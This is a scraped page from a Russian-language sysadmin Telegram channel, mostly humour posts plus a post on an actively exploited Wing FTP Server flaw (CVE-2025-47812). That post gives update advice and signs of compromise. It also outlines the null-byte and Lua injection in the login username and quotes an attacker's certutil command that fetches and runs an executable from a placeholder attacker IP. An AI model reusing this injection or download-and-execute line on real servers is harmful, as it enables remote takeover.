Типичный Сисадмин – Telegram
Типичный Сисадмин
33.9K subscribers
20K photos
867 videos
30 files
7.6K links
Обсуждаем бэкапы, которые никто не проверял, и пользователей, которые опять всё сломали.

🤝Реклама: @sysodmin
💚Предложка: @sysmeme_bot

РКН: vk.cc/cJ0Tm9
Download Telegram
☕️ Недавно с коллегами за чашкой кофе зашел у нас разговор о том, что же на самом деле делает сисадмина хорошим сисадмином? Роль у нас у всех многогранная, но мы попытались вывести три самых главных, универсальных навыка.

С практической точки зрения, мы сошлись на том, что нужно уметь документировать, автоматизировать и, что крайне важно, выводить из эксплуатации. Причем один мудро заметил, что порядок тут даже важнее, т.е. сначала грамотно выводим из эксплуатации старый хлам, потом документируем то, что осталось, и только потом автоматизируем. Ведь недокументированная, но чистая и понятная среда куда лучше, чем идеально описанный зоопарк из легаси-систем, который страшно трогать.

Но сошлись мы и на том, что чисто технические навыки лишь половина дела. Гораздо важнее оказались софт-скилзы, которые отличают просто исполнителя от настоящего инженера. Это, во-первых, умение учиться – постоянно и самостоятельно. Во-вторых, умение решать проблемы, то есть мыслить логически и методично, а не просто перебирать варианты. И в-третьих, что, возможно, самое сложное для многих, – умение вовремя просить о помощи. Никто не может знать всё, но хороший админ всегда знает, где найти ответ и не боится признать, что зашел в тупик. А еще важно быть человеком, с которым приятно работать, а не токсиком, отравляющим атмосферу в коллективе 😡

В итоге, получается, что идеальный сисадмин состоит из сплава технической дисциплины, умения постоянно учиться и человеческих качеств. Эти навыки позволяют пройти главный экзамен на профпригодность: настроить всё, задокументировать и уйти в отпуск так, чтобы никто не стрессовал (ни админ, ни коллеги).

Типичный 🥸 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7912🔥5💯3🤷‍♂11👏1🍾1
Сервер в шкафу спальни. Классика хоумлаба 🔊

Сначала ты хочешь просто поднять свой маленький VPN и файлопомойку, а через год твоя одежда особенно пахнет, плюс ты привык сладко засыпать под убаюкивающий рокот турбин.

Типичный 🥸 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
46😁30💊9👍31
Что-то даже захотелось выйти и продышаться после этого принесенного пк 🫁

Типичный 🏥 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
😭41😁18💊7🤯3🐳3😢1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😡58😢27🤷‍♂4🤯3
🧠 UX на минималках, доход — на максималках.

Хитрые разрабы.

Типичный 😶 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
😁71🌚6😡41🏆1🗿1
Некоторые костыли становятся несущей конструкцией 🎩

Типичный 🌚 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
51🌚25🔥9💯6🍾1
С каждым могло быть 🛌

Типичный 🥸 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥65😁36🫡16💯9😭2
Переход от софтверщика к хардверщику произошёл успешно. Зато не троттлит.

Типичный 🥸 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
😁62🏆14💊122🔥21
🔥 Wing FTP Server под атакой. Разбор уязвимости и комедия ошибок от хакеров.

Новость для всех, кто использует Wing FTP Server. В нем обнаружена критическая уязвимость CVE-2025-47812, которая позволяет удаленно выполнить код с правами SYSTEM/root.

Уязвимость уже активно эксплуатируется, так что если у вас развернут этот сервер, необходимо обновиться до версии 7.4.4.

Технически, уязвимость представляет собой комбинацию из инъекции нулевого байта (%00) и инъекции кода на языке Lua в параметре имени пользователя при аутентификации (через loginok.html). Атакующий может отправить специально сформированный запрос, используя учетную запись, для которой известен пароль (или анонимную, если она включена). Полезная нагрузка в поле username выглядит примерно так: `` имя_пользователя%00]]...вредоносный_Lua_код...-- ``. Нулевой байт обрывает обработку строки с именем, ]] корректно закрывает синтаксис объекта сессии, а -- комментирует остаток оригинального кода. В результате вредоносный Lua-код записывается в файл сессии на сервере (файл с расширением .lua в директории session). При следующем обращении к серверу (например, при запросе страницы dir.html) он считывает этот файл, десериализует данные и выполняет внедренный код.

Признаки взлома можно найти в логах сервера (Log\Domains\) — ищите обрезанные записи вида `` User 'anonymous `` (без закрывающей кавычки). Более надежный способ — проверить файлы сессий в директории session на аномально большой размер или наличие подозрительного Lua-кода (например, функций для hex-декодирования или вызова io.popen). Один из реальных пейлоадов, который обнаружили исследователи, выглядел так: `` certutil -urlcache -f http://[IP_АТАКУЮЩЕГО]/[payload.exe] %TEMP%\mvveiWJHx.exe & start /B %TEMP%\mvveiWJHx.exe ``.

А теперь самое интересное как это выглядело на практике. Аналитики из Huntress разобрали реальную атаку и выяснили, что уязвимостью воспользовались, мягко говоря, не самые опытные хакеры. Их действия были похожи на комедию ошибок: они запускали базовые команды для разведки (ipconfig, whoami), пытались создавать пользователей с паролями вроде 123123qweqwe, делали опечатки в путях к файлам (например, c:^A.exe, где ^A — это управляющий символ SOH), пытались запустить встроенную команду dir как внешний бинарник и не смогли правильно составить curl-команду для скачивания своего же бэкдора. В конце концов, они попытались скачать и запустить пейлоад с помощью certutil, но его тут же удалил Microsoft Defender (Trojan:Win32/Ceprolad.A). После этого процесс WFTPServer.exe упал, и сессия атакующих оборвалась 😂😂

Эх, а ведь были прекрасные нулевые, когда для взлома сервера нужно было быть настоящим гением. А теперь достаточно просто найти готовый эксплойт на GitHub и уметь правильно скопировать команду... хотя, как видно, даже с последним у некоторых проблемы 😬

Типичный 🥸 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
😁322👍1🔥1🌚1
Выпрямитель для самых маленьких 👌

Это полноволновой мостовой выпрямитель, собранный без единого паяльника, чисто на термо-соплях и честном слове. Он берет 120 вольт переменки и успешно выдает 170 вольт постоянки 💡

Типичный 🥸 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💊7718👍11🔥6👎31😁1
Опытный пользователь фиксанул перегрев БП ноута 🥇

Типичный 🥸 Сисадмин
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💊54🫡17🍾9🔥51
правила игры CrashDeck:

1) Вы застряли где-то (дома, в офисе, в мастерской, где угодно)

2) Вы можете использовать только те ресурсы, которые есть у вас под рукой в том месте, где вы застряли

3) Создайте функциональную кибердеку из того, что у вас есть.

4) вы должны иметь возможность вводить в него слова (с помощью клавиатуры, голосового распознавания, азбуки Морзе, чего угодно). Он должен иметь возможность чётко отображать вводимые вами данные (на дисплее, электронной бумаге, светодиодной матрице, принтере и т. д.)

4.5) всё должно держаться вместе, весь набор должен быть мобильным, чтобы его можно было переносить одной рукой, не разваливаясь на миллион частей.

5) У вас есть 1 час!

6) удачи!

my cyberdeck
🔥47🤔177👎32